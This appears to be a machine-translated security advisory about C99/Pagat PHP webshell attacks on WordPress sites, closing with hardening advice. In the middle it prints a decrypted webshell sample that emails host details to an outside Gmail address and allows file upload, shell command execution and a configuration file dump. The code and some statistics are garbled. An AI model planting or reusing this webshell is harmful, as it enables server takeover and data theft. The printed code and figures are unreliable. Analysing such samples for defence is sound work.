Wordpressc99phpwebshell attack intensified Anheng Ming Yu APT warning platform webshell audit alert

Wordpressc99phpwebshell attack intensification an Heng Ming Yu APT warning platform webshell audit warning wordpress c99 php webshell attack intensification an Heng Ming Yu APT warning platform webshell audit warning

Recently, the IBM management Security Service (MSS) team issued a warning that it had detected that a large number of WordPress sites were under new attacks by using C99 php webshell, remind the WordPress site administrator to promptly scan and fix site vulnerabilities.

It is reported that, based on the long-term monitoring and analysis of malicious events by the ibm mss team, security researchers have found that in the past two months, traffic exceptions caused by a class C99 webshell have occurred, among them, 404 incidents were detected in March, and 588 incidents were detected in March, as shown below:

For more information, see

Https://securityintelligence.com/got-wordpress-php-c99-webshell-attacks-increasing/

Anheng Research Institute used google search to collect c99 webshell samples

Decrypted to get

<? Php

Error_reporting (0 );

If (! Isset ($ _ SESSION ['bajak']) {

$ Visitcount = 0;

$ Web = $ _ SERVER ['http _ host'];

$ Inj = $ _ SERVER ['request _ URI '];

$ Body = "ada yang inject \ n {$ web} {$ inj }";

$ Safem0de = @ ini_get ('safe _ mode ');

If (! $ Safem0de ){

$ Security = 'safe _ MODE = off ';

} Else {

$ Security = 'safe _ MODE = on ';

}

$ Serper = gethostbyname ($ _ SERVER ['server _ ADDR ']);

$ Injektor = gethostbyname ($ _ SERVER ['remote _ ADDR ']);

Mail ('cumicd @ gmail.com ', "{$ body}", "Hasil Bajakan http: // {$ web} {$ inj} \ n {$ security} \ n IP Server ={$ serper} \ n IP Injector ={$ injektor }");

$ _ SESSION ['bajak'] = 0;

} Else {

$ _ SESSION ['bajak'] ++;

}

If (isset ($ _ GET ['Clone ']) {

$ Source = $ _ SERVER ['script _ filename'];

$ Desti = $ _ SERVER ['document _ root']. '/images/stories/food/footer. php ';

Rename ($ source, $ desti );

}

$ Safem0de = @ ini_get ('safe _ mode ');

If (! $ Safem0de ){

$ Security = 'safe _ MODE: off ';

} Else {

$ Security = 'safe _ MODE: on ';

}

Echo'Pagat-Shell
';

Echo''. $ Security .'
';

$ Cur_user = '('. get_current_user ().')';

Echo'User: uid = '. getmyuid (). $ cur_user. 'gid ='. getmygid (). $ cur_user .'
';

Echo'Uname: '. php_uname ().'
';

Function pwd ()

{

$ Cwd = getcwd ();

If ($ u = strrpos ($ cwd ,'/')){

If ($ u! = Strlen ($ cwd)-1 ){

Return $ cwd .'/';

} Else {

Return $ cwd;

}

} Elseif ($ u = strrpos ($ cwd ,'\\')){

If ($ u! = Strlen ($ cwd)-1 ){

Return $ cwd .'\\';

} Else {

Return $ cwd;

}

}

}

Echo '';

Echo '';

If (isset ($ _ POST ['submit ']) {

$ Uploaddir = pwd ();

If (! ($ Name = $ _ POST ['newname']) {

$ Name = $ _ FILES ['userfile'] ['name'];

}

Move_uploaded_file ($ _ FILES ['userfile'] ['tmp _ name'], $ uploaddir. $ name );

If (move_uploaded_file ($ _ FILES ['userfile'] ['tmp _ name'], $ uploaddir. $ name )){

Echo 'upload GAGAL !!! ';

} Else {

Echo 'upload Success to '. $ uploaddir. $ name.': \ P ';

}

}

If (isset ($ _ POST ['command']) {

$ Cmd = $ _ POST ['cmd'];

Echo'

’ .  shell_exec ( $cmd ) .  ‘

';

} Elseif (isset ($ _ GET ['cmd']) {

$ Comd = $ _ GET ['cmd'];

Echo'

’ .  shell_exec ( $comd ) .  ‘

';

} Elseif (isset ($ _ GET ['RF ']) {

$ Rf = file_get_contents ('../configuration. php ');

Echo $ rf;

} Else {

Echo'

’ .  shell_exec ( ‘ls -la’ ) .  ‘

';

}

?>

Further analysis of wordpress victims discovered

Https://www.google.com.hk /? Gws_rd = ssl # safe = strict & q = pagat + shell

Webshell allows attackers to run terminal commands on servers or upload new files to the site. new files can be more invasive webshells, DDoS clients, Bitcoin miner software, or other malware.

According to the ibm mss team, as of, only Google's search engine was used to find that approximately wordpresssites had pagat.txt files

The apt warning platform can monitor the webshell attack behavior in real time and warn c99 webshells that fail to escape the rules of the apt warning platform. it can be used to detect webshell attacks in the first time.

Security suggestions:

Based on the current situation, it is recommended that the site administrator perform the following operations,

1. edit the php. ini file and disable base64 decoding. In the php. ini file, find the related configuration statement "disable_functions =" and set this statement to "disable_functions = eval, base64_decode, gzinflate ";

2. change the name of the upload folder. WordPress allows you to write files to the upload folder through the upload program. if you still use the default name, attackers can easily guess the specific path of the file to be uploaded, this greatly reduces the cost of uploading php files containing shell scripts;

3. install a highly available security plug-in, such as the wordfence WordPress plug-in;

4. perform security scanning. We recommend that you use an open-source scanning tool to scan all uploaded files. here, you can use the scan tool Modsecurity. at the same time, you can use the AWVS or WordPress security scanner to scan the site to detect vulnerabilities in time, and carry out repair and reinforcement;

5. if the website has been infected, it is recommended that you change the password of all the management accounts of the site in time and notify the site user to change the password.

Security researcher: zise